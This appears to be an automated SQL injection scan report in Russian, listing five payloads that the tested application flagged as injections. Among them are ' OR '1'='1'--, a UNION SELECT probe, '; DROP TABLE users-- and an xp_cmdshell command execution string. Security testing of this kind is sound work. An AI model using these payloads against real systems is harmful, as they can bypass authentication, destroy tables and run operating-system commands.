Отчет о тестировании SQL-инъекции
========================================
Дата проверки: 2024-12-03 22:59:39
Всего проведено тестов: 15
Всего найдено уязвимостей: 5

Подробная информация об уязвимости:
----------------------------------------
Полезная нагрузка: ' OR '1'='1'--
Статус кода: 500
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: ' UNION SELECT NULL, NULL--
Статус кода: 500
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: ' AND 1=1--
Статус кода: 500
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: '; DROP TABLE users--
Статус кода: 500
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: '; EXEC xp_cmdshell('ping 127.0.0.1')--
Статус кода: 500
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
